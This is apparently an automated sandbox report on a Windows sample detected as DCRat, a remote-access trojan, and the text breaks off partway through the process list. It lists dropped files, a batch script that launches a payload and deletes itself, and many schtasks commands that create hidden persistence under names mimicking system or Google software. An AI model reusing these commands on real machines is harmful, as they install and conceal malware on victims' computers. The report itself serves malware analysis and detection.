                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\brokercrt.exe.log

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1740
                Entropy (8bit):5.36827240602657
                Encrypted:false
                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
                MD5:B28E0CCD25623D173B2EB29F3A99B9DD
                SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
                SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
                SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Users\user\AppData\Local\Temp\bWPufSNCBJ.bat

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:DOS batch file, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):198
                Entropy (8bit):5.149459720628026
                Encrypted:false
                SSDEEP:6:hITg3Nou11r+DE1BuslAAHovKOZG1923fw+kH:OTg9YDEOqI4P
                MD5:A120F36D4BA86068DE656EC5C360A59C
                SHA1:7C61C3D3BA1D13D120143CF5B8069D5A995800C3
                SHA-256:A38DC351B589024A9160113D219AEC1A68F771C222B4101505C12AA07F6C00DF
                SHA-512:F25046979B020549ACB2954D92AA89267A43CF87D08B03611E46F74700850E781A7484290A9ED9E89AF221F146FAC276FC0135E82AEDA40F2E2B11A97E5AEA94
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\user\AFKwztugVSPq.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bWPufSNCBJ.bat"

                C:\Users\user\AppData\Local\Temp\hE0vHax3wk

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):25
                Entropy (8bit):4.243856189774723
                Encrypted:false
                SSDEEP:3:F/n:F/n
                MD5:60CAEF9400437A97E3DE6AA1245BC1BA
                SHA1:FB8502E61F5231A08E8FFDE9B5F6C75692A6AC3D
                SHA-256:832C6F804C2DF2A9E30873F42F19301B68B22943CC962C5CE61AD811153DE899
                SHA-512:6278AB67A916A15EA1E87E7880663720BFDF95D0EF360BCB91E41E5242682F420BBD6B57B9F6C6AE6ADAF324C2787D16808FC31C35F58CE0DD5479434EFAA276
                Malicious:false
                Preview:TFZxwH1xw3DNHnScdT6fvrUXS

                C:\Windows\Containers\serviced\56085415360792

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):61
                Entropy (8bit):5.069600861940249
                Encrypted:false
                SSDEEP:3:52r9A3wJ0BbqXvLtGbQ:5w9DyADtGE
                MD5:7E4B1011E634C9487783E3AAFB05B38C
                SHA1:9C50E2D9F24DF7E47BEEE28DDD1148903DC7E379
                SHA-256:E6CC6B2A0D1EB2FB72D0977D3BC0611F8733B971A835491AAE129141A38A1BEE
                SHA-512:5C5E98BBD34A6280FF00ADB4DC079E2F7B53CF824FDCFC7535E1F9EAA36A81C8A5609782F23668C76C8007BF622EEF546CF6BAB0274A6974A05AE7D4C0D7CA21
                Malicious:false
                Preview:wcFreGyBhsgQDW0e9ABBXQl3G6D6N7FXaiWHzE8QhgS85TCsecyHEfqg1LlhD

                C:\Windows\Containers\serviced\wininit.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.371677590764862
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.97%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:hx1hwVZIjy.exe
                File size:1'165'442 bytes
                MD5:48e5ef4a0ca234c29ceecab25fe23d91
                SHA1:058fec1d069ba2dd6f7ef3af7ff65066b5b9f7b9
                SHA256:0641afd15fce62b273a73f7c8df67b4f192c4056ec788937d6d52a2e814c2ddc
                SHA512:6ba2d8666b43f80e86e1fbf8f4a694d1fe165d86d467ace38094adc585f77a68665dfa7ea7f2dc55ea8977971926b0cc947f410738e8670d8b344471f07dd65b
                SSDEEP:24576:U2G/nvxW3Ww0tLmbqJB7ioiB9yzs9/Hi+i01ZxtYZH:UbA30Lmby7Or9vDE
                TLSH:884549017F44DA11F0191633C2EF490847B4AC11ABA6E72B7EBA376D59123A77C4DACB
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

                File Icon

                Icon Hash:1515d4d4442f2d2d

                Static PE Info

                General

                Entrypoint:0x41ec40
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                Entrypoint Preview

                Instruction
                call 00007F37A12C6379h
                jmp 00007F37A12C5D8Dh
                cmp ecx, dword ptr [0043E668h]
                jne 00007F37A12C5F05h
                ret
                jmp 00007F37A12C64FEh
                int3
                int3
                int3
                int3
                int3
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007F37A12B8C97h
                mov dword ptr [esi], 00435580h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 00435588h
                mov dword ptr [ecx], 00435580h
                ret
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 00435568h
                push eax
                call 00007F37A12C909Dh
                pop ecx
                ret
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F37A12B8C2Eh
                push 0043B704h
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F37A12C87B2h
                int3
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F37A12C5EA4h
                push 0043B91Ch
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F37A12C8795h
                int3
                jmp 00007F37A12CA7E3h
                jmp dword ptr [00433260h]
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                push 00421EB0h
                push dword ptr fs:[00000000h]

                Rich Headers

                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [C++] VS2015 UPD3.1 build 24215
                • [EXP] VS2015 UPD3.1 build 24215
                • [RES] VS2015 UPD3 build 24213
                • [LNK] VS2015 UPD3.1 build 24215

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x630000xdfd00xe000f6c0f34fae6331b50a7ad2efc4bfefdbFalse0.6370326450892857data6.6367506404157535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                RT_ICON0x657480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                RT_ICON0x65cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                RT_ICON0x665580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                RT_ICON0x674000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                RT_ICON0x678680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                RT_ICON0x689100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                RT_DIALOG0x6f5880x286dataEnglishUnited States0.5092879256965944
                RT_DIALOG0x6f3580x13adataEnglishUnited States0.60828025477707
                RT_DIALOG0x6f4980xecdataEnglishUnited States0.6991525423728814
                RT_DIALOG0x6f2280x12edataEnglishUnited States0.5927152317880795
                RT_DIALOG0x6eef00x338dataEnglishUnited States0.45145631067961167
                RT_DIALOG0x6ec980x252dataEnglishUnited States0.5757575757575758
                RT_STRING0x6ff680x1e2dataEnglishUnited States0.3900414937759336
                RT_STRING0x701500x1ccdataEnglishUnited States0.4282608695652174
                RT_STRING0x703200x1b8dataEnglishUnited States0.45681818181818185
                RT_STRING0x704d80x146dataEnglishUnited States0.5153374233128835
                RT_STRING0x706200x446dataEnglishUnited States0.340036563071298
                RT_STRING0x70a680x166dataEnglishUnited States0.49162011173184356
                RT_STRING0x70bd00x152dataEnglishUnited States0.5059171597633136
                RT_STRING0x70d280x10adataEnglishUnited States0.49624060150375937
                RT_STRING0x70e380xbcdataEnglishUnited States0.6329787234042553
                RT_STRING0x70ef80xd6dataEnglishUnited States0.5747663551401869
                RT_GROUP_ICON0x6ec300x68dataEnglishUnited States0.7019230769230769
                RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                Imports

                DLLImport
                KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                No network behavior found

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:07:36:52
                Start date:19/04/2024
                Path:C:\Users\user\Desktop\hx1hwVZIjy.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\hx1hwVZIjy.exe"
                Imagebase:0xf30000
                File size:1'165'442 bytes
                MD5 hash:48E5EF4A0CA234C29CEECAB25FE23D91
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                General

                Target ID:2
                Start time:07:36:53
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe"
                Imagebase:0x8a0000
                File size:147'456 bytes
                MD5 hash:FF00E0480075B095948000BDC66E81F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                General

                Target ID:3
                Start time:07:37:01
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" "
                Imagebase:0x790000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:4
                Start time:07:37:01
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:5
                Start time:07:37:01
                Start date:19/04/2024
                Path:C:\ReviewHost\brokercrt.exe
                Wow64 process (32bit):false
                Commandline:"C:\ReviewHost\brokercrt.exe"
                Imagebase:0xaf0000
                File size:848'384 bytes
                MD5 hash:96B975481850ADD8CCB0353227ECEB87
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2112725978.0000000003397000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2112725978.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 88%, ReversingLabs
                • Detection: 79%, Virustotal, Browse
                Reputation:low
                Has exited:true

                General

                Target ID:6
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:7
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:8
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:9
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:10
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:11
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:12
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:13
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:14
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:15
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 8 /tr "'C:\Users\Default\WinStore.App.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:16
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:17
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 5 /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:18
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:19
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
